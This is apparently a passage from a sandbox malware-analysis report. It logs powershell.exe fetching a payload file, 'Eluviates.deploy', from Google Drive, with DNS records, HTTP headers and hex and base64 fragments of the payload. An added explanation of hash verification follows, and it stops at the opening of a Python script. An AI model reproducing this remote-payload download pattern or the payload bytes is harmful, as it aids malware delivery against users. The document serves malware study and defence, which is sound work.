            Jul 3, 2024 08:54:47.518821955 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.518846035 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.518867016 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.518892050 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.524172068 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.524245024 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.524259090 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.524748087 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.524801970 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.524807930 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.524817944 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.524884939 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.525296926 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.530016899 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.530076027 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.530091047 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.530281067 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.530316114 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.530334949 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.530355930 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.530402899 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.531095028 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.535906076 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.535968065 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.535983086 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.536067963 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.536119938 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.536132097 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.536942005 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.536972046 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.536998034 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.537012100 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.537067890 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.542644024 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.542680979 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.542731047 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.542746067 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.543921947 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.543941021 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.543984890 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.543998957 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.544075012 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.546454906 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.547172070 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.547215939 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.547225952 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.547241926 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.547296047 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.547826052 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.550797939 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.550827026 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.550856113 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.550887108 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.550940037 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.551251888 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.552151918 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.552208900 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.552222013 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.557370901 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.557400942 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.557445049 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.557459116 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.557533026 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.558057070 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.558128119 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.558192968 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.558424950 CEST56536443192.168.2.8142.250.186.161
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Jul 3, 2024 08:53:09.186937094 CEST | 53 | 59804 | 1.1.1.1 | 192.168.2.8
            Jul 3, 2024 08:54:44.455446959 CEST | 64614 | 53 | 192.168.2.8 | 1.1.1.1
            Jul 3, 2024 08:54:44.462570906 CEST | 53 | 64614 | 1.1.1.1 | 192.168.2.8
            Jul 3, 2024 08:54:45.519728899 CEST | 52110 | 53 | 192.168.2.8 | 1.1.1.1
            Jul 3, 2024 08:54:45.528116941 CEST | 53 | 52110 | 1.1.1.1 | 192.168.2.8
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Jul 3, 2024 08:54:44.455446959 CEST | 192.168.2.8 | 1.1.1.1 | 0x46c9 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
            Jul 3, 2024 08:54:45.519728899 CEST | 192.168.2.8 | 1.1.1.1 | 0x6886 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Jul 3, 2024 08:52:48.815088034 CEST | 1.1.1.1 | 192.168.2.8 | 0x7658 | No error (0) | windowsupdatebg.s.llnwi.net | | 87.248.204.0 | A (IP address) | IN (0x0001) | false
            Jul 3, 2024 08:54:44.462570906 CEST | 1.1.1.1 | 192.168.2.8 | 0x46c9 | No error (0) | drive.google.com | | 142.250.186.78 | A (IP address) | IN (0x0001) | false
            Jul 3, 2024 08:54:45.528116941 CEST | 1.1.1.1 | 192.168.2.8 | 0x6886 | No error (0) | drive.usercontent.google.com | | 142.250.186.161 | A (IP address) | IN (0x0001) | false
            • drive.google.com
            • drive.usercontent.google.com
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.8 | 56535 | 142.250.186.78 | 443 | 1296 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-03 06:54:45 UTC | 215 | OUT | GET /uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.google.com
            Connection: Keep-Alive
            2024-07-03 06:54:45 UTC | 1598 | IN | HTTP/1.1 303 See Other
            Content-Type: application/binary
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Wed, 03 Jul 2024 06:54:45 GMT
            Location: https://drive.usercontent.google.com/download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download
            Strict-Transport-Security: max-age=31536000
            Cross-Origin-Opener-Policy: same-origin
            Content-Security-Policy: script-src 'nonce-17Z0VtJSKKj0GbP6SGO4Cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            Server: ESF
            Content-Length: 0
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.8 | 56536 | 142.250.186.161 | 443 | 1296 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-03 06:54:46 UTC | 233 | OUT | GET /download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.usercontent.google.com
            Connection: Keep-Alive
            2024-07-03 06:54:47 UTC | 4828 | IN | HTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Content-Security-Policy: sandbox
            Content-Security-Policy: default-src 'none'
            Content-Security-Policy: frame-ancestors 'none'
            X-Content-Security-Policy: sandbox
            Cross-Origin-Opener-Policy: same-origin
            Cross-Origin-Embedder-Policy: require-corp
            Cross-Origin-Resource-Policy: same-site
            X-Content-Type-Options: nosniff
            Content-Disposition: attachment; filename="Eluviates.deploy"
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Credentials: false
            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
            Accept-Ranges: bytes
            Content-Length: 478064
            Last-Modified: Tue, 02 Jul 2024 08:49:09 GMT
            X-GUploader-UploadID: ACJd0Np1VxZcuVKT_qJhXrp3BDVpD3lksEquAZXFJg8DTrGd5YVCDN45rHBgwz5-QxTBOc5AI28-PwmHyA
            Date: Wed, 03 Jul 2024 06:54:46 GMT
            Expires: Wed, 03 Jul 2024 06:54:46 GMT
            Cache-Control: private, max-age=0
            X-Goog-Hash: crc32c=cUFqng==
            Server: UploadServer
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close
            2024-07-03 06:54:47 UTC4828INData Raw: 36 77 4c 46 45 58 45 42 6d 37 75 4e 56 78 77 41 63 51 47 62 36 77 49 34 64 41 4e 63 4a 41 54 72 41 76 69 64 36 77 4b 44 43 72 6d 2b 58 4d 6b 6f 36 77 4c 51 69 2b 73 43 52 2b 61 42 38 52 67 43 6a 38 4e 78 41 5a 76 72 41 70 6e 4d 67 66 47 6d 58 6b 62 72 36 77 4a 34 30 6e 45 42 6d 2b 73 43 51 75 31 78 41 5a 75 36 61 48 52 4b 6a 4f 73 43 30 6a 6e 72 41 6a 4c 57 63 51 47 62 36 77 4b 45 71 6a 48 4b 36 77 49 65 67 75 73 43 57 57 69 4a 46 41 76 72 41 69 48 36 36 77 4a 6e 77 39 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 4b 57 6c 65 73 43 2f 33 61 42 2b 54 4d 62 72 67 56 38 79 65 73 43 73 58 7a 72 41 69 6c 30 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 36 77 49 73 4f 4f 73 43 2f 73 61 42 77 2b 35 67 43 77 4e 78 41 5a 74 78 41 5a 75 36 44 58 51 45 68 65 73
            Data Ascii: 6wLFEXEBm7uNVxwAcQGb6wI4dANcJATrAvid6wKDCrm+XMko6wLQi+sCR+aB8RgCj8NxAZvrApnMgfGmXkbr6wJ40nEBm+sCQu1xAZu6aHRKjOsC0jnrAjLWcQGb6wKEqjHK6wIegusCWWiJFAvrAiH66wJnw9HicQGbcQGbg8EE6wKWlesC/3aB+TMbrgV8yesCsXzrAil0i0QkBHEBm3EBm4nD6wIsOOsC/saBw+5gCwNxAZtxAZu6DXQEhes
            2024-07-03 06:54:47 UTC4828INData Raw: 50 4e 55 4c 48 39 79 70 4a 4c 6f 51 43 6e 68 5a 57 6d 47 63 48 38 52 4b 47 36 35 50 41 70 6a 47 32 65 43 49 72 65 47 4a 75 57 75 33 32 39 66 46 75 44 4f 6b 4e 62 2b 6c 52 37 51 52 52 32 6c 69 41 47 48 59 74 6d 5a 48 4d 67 33 30 59 5a 49 6e 53 6c 56 41 46 65 49 35 4a 41 5a 59 65 79 68 4a 64 4f 4d 63 41 54 73 61 35 34 7a 46 45 55 45 66 4c 36 39 6d 4f 53 2f 4f 44 71 6f 50 4a 2b 30 6d 52 41 71 6a 75 6d 35 38 71 4f 4a 39 4e 62 6b 30 32 6d 67 4f 61 49 78 4d 67 7a 47 71 5a 53 39 55 33 37 59 4f 61 44 74 74 68 35 47 69 74 52 34 32 69 52 67 4d 4f 6f 51 79 43 2b 45 33 53 52 52 47 65 68 37 50 69 4e 45 71 2b 32 58 68 31 36 63 2f 61 63 4f 38 2b 6a 77 56 53 38 39 61 76 6e 34 49 71 49 62 4c 69 58 58 6a 53 66 78 35 4d 64 6b 67 62 4b 5a 4c 76 4b 70 39 41 6e 45 54 4a 77 35
            Data Ascii: PNULH9ypJLoQCnhZWmGcH8RKG65PApjG2eCIreGJuWu329fFuDOkNb+lR7QRR2liAGHYtmZHMg30YZInSlVAFeI5JAZYeyhJdOMcATsa54zFEUEfL69mOS/ODqoPJ+0mRAqjum58qOJ9Nbk02mgOaIxMgzGqZS9U37YOaDtth5GitR42iRgMOoQyC+E3SRRGeh7PiNEq+2Xh16c/acO8+jwVS89avn4IqIbLiXXjSfx5MdkgbKZLvKp9AnETJw5
            2024-07-03 06:54:47 UTC213INData Raw: 69 34 2b 65 59 77 37 4d 44 6c 70 51 49 50 42 72 61 74 54 66 53 68 38 71 59 5a 37 4c 6a 70 34 72 52 7a 71 55 45 4d 4c 38 58 70 79 38 68 4c 7a 4f 79 49 67 45 75 64 33 30 2b 71 53 57 6d 65 58 65 47 2b 79 34 5a 55 72 48 39 4b 50 6f 31 65 5a 47 35 64 73 6c 6c 5a 58 68 6a 66 31 6a 30 33 59 76 69 30 4e 76 33 75 4d 55 4d 50 77 57 38 63 55 53 4a 72 31 58 77 74 6c 4c 49 7a 31 39 76 6a 6b 44 65 6e 6d 73 61 4f 32 6d 30 6b 41 6c 61 69 31 50 61 71 49 6e 44 58 45 45 32 53 2f 5a 4e 57 71 74 47 50 6f 66 77 59 35 4f 6a 45 51 4b 66 54 75 46 47 4d 67 66 77 63 48 6c 6a 57 72 62 45 78 66 4c 69 70 38 44 54 62 4a 57 36 69 78 64 6a 62 38 68 35 52 4a 75 4d
            Data Ascii: i4+eYw7MDlpQIPBratTfSh8qYZ7Ljp4rRzqUEML8Xpy8hLzOyIgEud30+qSWmeXeG+y4ZUrH9KPo1eZG5dsllZXhjf1j03Yvi0Nv3uMUMPwW8cUSJr1XwtlLIz19vjkDenmsaO2m0kAlai1PaqInDXEE2S/ZNWqtGPofwY5OjEQKfTuFGMgfwcHljWrbExfLip8DTbJW6ixdjb8h5RJuM
            2024-07-03 06:54:47 UTC1324INData Raw: 7a 42 4e 57 61 47 69 5a 4f 2f 6f 4d 69 4a 58 30 77 50 4a 4e 53 51 45 64 33 52 70 37 64 4d 2f 74 31 39 77 37 39 47 7a 65 73 59 54 5a 4e 55 58 72 75 65 4f 6e 69 74 48 6a 64 6a 50 50 72 64 2b 34 7a 71 58 70 56 5a 6f 6c 38 49 70 35 74 79 31 51 4d 69 62 6d 69 58 65 59 66 71 75 74 73 74 44 7a 77 49 36 72 43 6d 4c 6a 79 44 47 57 4f 73 73 35 79 6e 58 4e 58 33 5a 75 45 75 6e 73 45 54 46 6a 56 47 59 42 30 33 44 45 41 64 53 66 67 73 66 65 30 2b 56 2f 30 50 48 36 44 44 66 6b 47 50 2b 69 67 44 6c 76 36 70 39 49 64 2f 7a 6f 39 34 6e 36 72 4c 59 4b 61 70 36 56 64 59 6d 36 51 35 66 42 72 55 70 74 4b 4b 79 55 58 4c 2f 61 35 5a 4c 77 4f 41 63 73 6b 50 47 30 46 5a 6b 41 41 52 36 6a 45 4e 68 36 2f 74 54 52 68 6d 37 7a 58 68 57 52 48 72 57 48 39 30 42 47 62 75 56 43 6e 6c 58
            Data Ascii: zBNWaGiZO/oMiJX0wPJNSQEd3Rp7dM/t19w79GzesYTZNUXrueOnitHjdjPPrd+4zqXpVZol8Ip5ty1QMibmiXeYfqutstDzwI6rCmLjyDGWOss5ynXNX3ZuEunsETFjVGYB03DEAdSfgsfe0+V/0PH6DDfkGP+igDlv6p9Id/zo94n6rLYKap6VdYm6Q5fBrUptKKyUXL/a5ZLwOAcskPG0FZkAAR6jENh6/tTRhm7zXhWRHrWH90BGbuVCnlX
            2024-07-03 06:54:47 UTC1390INData Raw: 2f 59 31 76 79 61 6f 63 6f 4f 71 72 75 53 53 42 44 5a 58 44 51 70 4f 41 4f 61 4d 50 78 2f 61 6b 79 69 6a 79 77 70 2b 71 77 74 6e 75 63 38 6b 69 35 39 33 4b 34 75 50 6e 69 75 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 69 75 4c 6a 35 34 72 69 34 2b 65 4b 39 37 73 75 30 4c 64 43 31 68 62 42 36 6a 70 4c 50 36 69 2b 6d 47 78 35 65 38 54 41 41 4c 47 4b 59 75 50 7a 5a 42 6f 5a 39 74 72 43 6b 77 54 78 4a 49 33 48 2b 69 6f 4a 48 33 46 43 6e 79 48 46 76 77 6b 48 2b 6a 39 7a 56 57 59 32 68 4d 58 79 6f 4b 57 41 36 39 43 2b 4c 2f 67 38 53 31 4e 31 67 44 2f 65 4f 44 4f 49 44 4f 5a 44 43 36 56 59 34 75 55 7a 64 37 49 47 55 2b 30 55 66 48 4b 32 34 30 70 5a 4e 77 32 59 4c 43 2f 72 70 52 52 56 6f 76 2f 42 66 42 46 43 31 64 79 44 32 50 46 65 34 53 4f 72 6e 71 4c 6a 35 34 72
            Data Ascii: /Y1vyaocoOqruSSBDZXDQpOAOaMPx/akyijywp+qwtnuc8ki593K4uPniuLj54ri4+eK4uPniuLj54ri4+eK97su0LdC1hbB6jpLP6i+mGx5e8TAALGKYuPzZBoZ9trCkwTxJI3H+ioJH3FCnyHFvwkH+j9zVWY2hMXyoKWA69C+L/g8S1N1gD/eODOIDOZDC6VY4uUzd7IGU+0UfHK240pZNw2YLC/rpRRVov/BfBFC1dyD2PFe4SOrnqLj54r
            2024-07-03 06:54:47 UTC1390INData Raw: 71 53 62 35 75 73 61 30 4f 62 47 51 62 76 4d 2b 71 65 51 58 72 5a 57 30 4f 58 47 31 41 49 76 61 69 69 52 35 42 59 78 63 2f 41 63 56 47 53 4c 52 5a 6f 37 51 41 49 6b 51 70 58 46 6c 56 76 4d 6d 52 69 7a 68 56 47 73 30 76 44 49 75 62 31 56 4b 52 43 77 38 39 75 6b 41 73 44 35 53 34 2b 4e 33 48 32 4d 57 36 4d 55 64 32 38 35 64 34 2f 4c 44 56 66 67 39 35 66 41 42 4d 56 7a 34 44 4c 67 33 70 64 77 52 4b 5a 53 56 67 69 79 36 74 70 6f 54 34 4c 67 51 44 41 34 71 50 6e 6e 30 31 52 44 59 34 50 51 35 6f 37 57 54 4d 2f 36 70 39 50 67 78 79 45 41 35 77 70 36 61 69 71 4b 70 39 65 35 2f 33 6e 67 61 41 4d 4e 62 71 75 34 66 30 50 70 38 57 59 78 47 34 34 4a 37 53 55 4b 41 35 57 33 48 4c 64 48 45 6a 54 6a 31 7a 31 64 6a 75 38 31 32 43 67 46 30 73 74 53 75 34 64 73 32 38 34 78
            Data Ascii: qSb5usa0ObGQbvM+qeQXrZW0OXG1AIvaiiR5BYxc/AcVGSLRZo7QAIkQpXFlVvMmRizhVGs0vDIub1VKRCw89ukAsD5S4+N3H2MW6MUd285d4/LDVfg95fABMVz4DLg3pdwRKZSVgiy6tpoT4LgQDA4qPnn01RDY4PQ5o7WTM/6p9PgxyEA5wp6aiqKp9e5/3ngaAMNbqu4f0Pp8WYxG44J7SUKA5W3HLdHEjTj1z1dju812CgF0stSu4ds284x
            2024-07-03 06:54:47 UTC1390INData Raw: 69 4b 63 45 4b 49 78 45 6a 38 2b 73 78 76 74 57 43 45 75 35 4e 76 44 6d 61 59 77 73 61 4a 58 42 6f 36 6c 49 57 55 79 73 70 47 31 53 71 38 71 30 68 72 4b 6b 72 32 74 68 47 58 42 4c 59 70 59 59 73 76 6d 51 64 6a 49 68 7a 69 50 71 2b 4f 36 4a 68 30 54 65 37 37 56 65 67 2b 65 77 4b 36 6a 41 35 6c 7a 6a 76 36 69 54 4d 70 44 4c 66 7a 6c 43 44 77 57 57 35 71 30 57 37 79 63 36 69 79 66 73 38 7a 52 61 72 45 55 67 42 7a 6e 56 2b 68 72 4d 73 70 78 6d 42 48 4f 46 6c 30 46 46 37 44 7a 37 33 61 70 75 75 59 75 32 43 32 36 4a 57 73 65 62 4d 69 56 46 71 44 75 6f 77 70 35 52 4b 39 71 71 42 2f 64 7a 43 55 50 68 4e 77 54 46 38 79 43 75 41 4f 76 55 76 61 61 6d 73 51 34 77 2b 57 45 4f 49 49 63 4b 30 63 37 6b 68 32 75 75 56 75 65 34 31 79 42 57 4d 46 4c 48 46 39 5a 7a 72 68 71
            Data Ascii: iKcEKIxEj8+sxvtWCEu5NvDmaYwsaJXBo6lIWUyspG1Sq8q0hrKkr2thGXBLYpYYsvmQdjIhziPq+O6Jh0Te77Veg+ewK6jA5lzjv6iTMpDLfzlCDwWW5q0W7yc6iyfs8zRarEUgBznV+hrMspxmBHOFl0FF7Dz73apuuYu2C26JWsebMiVFqDuowp5RK9qqB/dzCUPhNwTF8yCuAOvUvaamsQ4w+WEOIIcK0c7kh2uuVue41yBWMFLHF9Zzrhq
            2024-07-03 06:54:47 UTC1390INData Raw: 38 68 45 30 53 55 75 4f 34 54 48 34 64 32 33 2f 6c 4c 73 57 69 46 68 2b 66 4b 34 74 44 2b 69 70 77 72 47 4e 43 61 64 54 2f 44 6f 55 53 32 6c 77 45 42 7a 68 4d 52 32 59 35 44 4a 46 77 6a 46 71 78 4e 65 53 51 74 61 78 41 63 64 6b 31 6d 41 31 71 75 42 2f 5a 58 4b 38 79 56 41 70 6c 35 36 6a 53 30 42 2f 42 30 77 31 74 77 39 30 54 46 38 32 43 6d 51 4f 75 58 50 79 63 78 35 66 50 79 68 4e 6a 4c 4b 72 76 52 2b 56 65 6b 5a 77 79 50 4d 33 6f 56 30 6d 65 4c 69 78 6f 39 69 47 77 32 31 33 2f 75 78 37 52 68 39 47 6d 34 64 47 41 6e 33 36 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 69 75 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 69 75 4c 6a 39 43 55 4e 63 4c 36 33 4e 56 64 32 36 36 68 43 57 75 71 53 42 37 4b 5a 31 49 4f 58 5a 39 58 70 6d 61 71 53 50 49 31 67 46 6a 63 7a 4a
            Data Ascii: 8hE0SUuO4TH4d23/lLsWiFh+fK4tD+ipwrGNCadT/DoUS2lwEBzhMR2Y5DJFwjFqxNeSQtaxAcdk1mA1quB/ZXK8yVApl56jS0B/B0w1tw90TF82CmQOuXPycx5fPyhNjLKrvR+VekZwyPM3oV0meLixo9iGw213/ux7Rh9Gm4dGAn36Lj54ri4+eK4uPniuLj54ri4+eK4uPniuLj9CUNcL63NVd266hCWuqSB7KZ1IOXZ9XpmaqSPI1gFjczJ
            2024-07-03 06:54:47 UTC1390INData Raw: 69 75 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 6e 73 42 4e 65 41 45 53 59 67 36 54 6f 4a 43 78 38 69 34 66 69 7a 48 6c 6c 4c 35 41 4b 44 71 78 6e 30 31 71 47 31 6a 36 41 35 59 74 67 56 6b 63 36 70 6c 31 44 6f 65 6f 67 35 6f 38 64 69 38 38 4b 70 6c 44 5a 44 6d 77 67 61 41 6f 76 53 53 41 75 65 64 72 41 6e 4f 2b 6b 53 4c 4f 59 51 56 50 63 6c 70 36 52 69 55 50 65 41 57 76 34 58 62 30 65 30 6e 72 68 70 30 58 58 4d 7a 57 53 4f 4a 38 4e 50 56 42 67 76 41 69 6f 2b 65 65 7a 4f 4b 44 37 48 6a 75 6d 70 34 2f 67 43 72 51 44 7a 4c 32 78 34 52 2b 7a 57 4a 32 68 4d 58 79 6f 71 4f 41 30 32 79 64 65 55 4c 52 4c 4e 55 71 32 61 39 69 4a 6d 41 2f 42 48 76 65 7a 4d 2b 7a 74 6f 43 6e 5a 70 73 6e 66 32 74 4a 4b 61 4f 59 2f 4e 6b 65 39 6c 48 4a 45 76 58 50 51 61 44 4e 70 48 61
            Data Ascii: iuLj54ri4+eK4uPnnsBNeAESYg6ToJCx8i4fizHllL5AKDqxn01qG1j6A5YtgVkc6pl1Doeog5o8di88KplDZDmwgaAovSSAuedrAnO+kSLOYQVPclp6RiUPeAWv4Xb0e0nrhp0XXMzWSOJ8NPVBgvAio+eezOKD7Hjump4/gCrQDzL2x4R+zWJ2hMXyoqOA02ydeULRLNUq2a9iJmA/BHvezM+ztoCnZpsnf2tJKaOY/Nke9lHJEvXPQaDNpHa
            2024-07-03 06:54:47 UTC1390INData Raw: 4a 2f 68 32 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 69 75 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 69 75 4c 78 46 41 35 78 72 51 68 54 30 69 4e 48 59 70 59 77 79 54 55 64 41 32 30 77 36 78 31 59 64 51 41 77 37 6f 6a 41 49 37 65 6f 6f 70 6d 72 69 71 4c 6a 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
            Data Ascii: J/h2Lj54ri4+eK4uPniuLj54ri4+eK4uPniuLxFA5xrQhT0iNHYpYwyTUdA20w6x1YdQAw7ojAI7eoopmriqLjwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
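
            The second session above is the payload fetch: drive.google.com answers the /uc?export=download request with a 303 to drive.usercontent.google.com, which serves "Eluviates.deploy" (Content-Length 478064) with an X-Goog-Hash header carrying the file's CRC32C. When a download like this is carved from a pcap or recovered from a sandbox file dump, the header gives a cheap integrity check before any further analysis. The script below is an added example, not part of the Joe Sandbox report: it implements CRC-32C, parses a header block in the shape captured above, and compares Content-Length and the crc32c value against the body. It assumes the documented X-Goog-Hash encoding (base64 of the four big-endian CRC32C bytes); the header block and the nine-byte body are constructed stand-ins, not the real 478,064-byte payload.

```python
"""Verify a captured Google Drive download against its X-Goog-Hash header.

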